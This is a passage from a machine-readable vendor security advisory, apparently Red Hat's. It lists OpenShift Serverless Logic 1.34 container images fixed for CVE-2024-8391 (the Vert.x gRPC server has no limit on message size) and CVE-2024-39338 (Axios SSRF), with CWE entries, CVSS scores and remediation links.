"openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", }, product_reference: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", }, product_reference: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", }, product_reference: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", }, product_reference: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", }, product_reference: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", }, product_reference: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", }, product_reference: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", }, product_reference: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, ], }, vulnerabilities: [ { cve: "CVE-2024-8391", cwe: { id: "CWE-770", name: "Allocation of Resources Without Limits or Throttling", }, discovery_date: "2024-09-04T16:20:44.762419+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2309758", }, ], notes: [ { category: "description", text: "A flaw was found in the gRPC server in Eclipse Vert.x, which does not limit the maximum length of the message payload. This may lead to excessive memory consumption in a server or a client, causing a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-8391", }, { category: "external", summary: "RHBZ#2309758", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309758", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-8391", url: "https://www.cve.org/CVERecord?id=CVE-2024-8391", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-8391", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-8391", }, { category: "external", summary: "https://github.com/eclipse-vertx/vertx-grpc/issues/113", url: "https://github.com/eclipse-vertx/vertx-grpc/issues/113", }, { category: "external", summary: "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31", url: "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31", }, ], release_date: "2024-09-04T16:15:09.253000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size", }, { cve: "CVE-2024-39338", cwe: { id: "CWE-918", name: "Server-Side Request Forgery (SSRF)", }, discovery_date: "2024-08-13T17:21:32.774718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2304369", }, ], notes: [ { category: "description", text: "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.", title: "Vulnerability description", }, { category: "summary", text: "axios: axios: Server-Side Request Forgery", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", 